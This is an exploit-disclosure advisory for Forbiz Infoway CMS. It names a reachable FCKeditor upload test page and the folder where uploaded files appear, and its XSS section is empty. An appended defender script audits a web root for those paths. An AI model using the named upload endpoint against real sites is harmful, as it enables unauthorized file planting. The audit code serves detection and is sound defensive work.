================================================================================
Forbiz Infoway CMS - File Upload / Cross Site Scripting
================================================================================
# Vendor Homepage: http://www.forbiz.co.in/
# Date: 07/10/2016
# Author: Ashiyane Digital Security Team
# Version: All
================================================================================
# PoC of File Upload (FCKeditor):
Vulnerable page : http://localhost/cms/editor/filemanager/connectors/uploadtest.html
Path of file : http://localhost/images/fck_editor_images/file.txt

# PoC of Xss :
# Demo :
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================
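
Added example, not part of the original advisory: a defender-side audit of a web root for the two paths the PoC names, the connector upload test page and non-image files under images/fck_editor_images/. The image-only allowlist, the function names and the sample tree are assumptions made for this example.

```python
import os
import tempfile

# Paths come from the advisory; the image-only allowlist is an assumption.
CONNECTOR_DIR = os.path.join("editor", "filemanager", "connectors")
TEST_PAGE = "uploadtest.html"
UPLOAD_DIR = os.path.join("images", "fck_editor_images")
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}


def suspicious_name(name):
    """True unless every dot-separated suffix is an allowed image extension."""
    suffixes = name.lower().split(".")[1:]
    # Catches file.txt, page.html, banner.php.jpg and extension-less files.
    return not suffixes or any(s not in ALLOWED_EXT for s in suffixes)


def audit_webroot(webroot):
    """Return (test_pages, unexpected_uploads) as sorted paths relative to webroot."""
    test_pages, uploads = [], []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        in_uploads = rel_dir == UPLOAD_DIR or rel_dir.startswith(UPLOAD_DIR + os.sep)
        for name in files:
            rel = os.path.join(rel_dir, name)
            if name.lower() == TEST_PAGE and rel_dir.endswith(CONNECTOR_DIR):
                test_pages.append(rel)   # upload test page left on the server
            elif in_uploads and suspicious_name(name):
                uploads.append(rel)      # non-image content in the editor's folder
    return sorted(test_pages), sorted(uploads)


def build_sample_tree(root):
    """Constructed sample web root mirroring the layout in the advisory."""
    for rel in ("cms/editor/filemanager/connectors/uploadtest.html",
                "images/fck_editor_images/file.txt",
                "images/fck_editor_images/logo.png",
                "images/fck_editor_images/banner.php.jpg",
                "index.html"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        pages, files = audit_webroot(tmp)
        print("upload test pages:", pages)
        print("unexpected uploads:", files)
```

Files with several dots in the name (for example my.photo.jpg) are also reported, so treat the second list as items to review rather than confirmed findings.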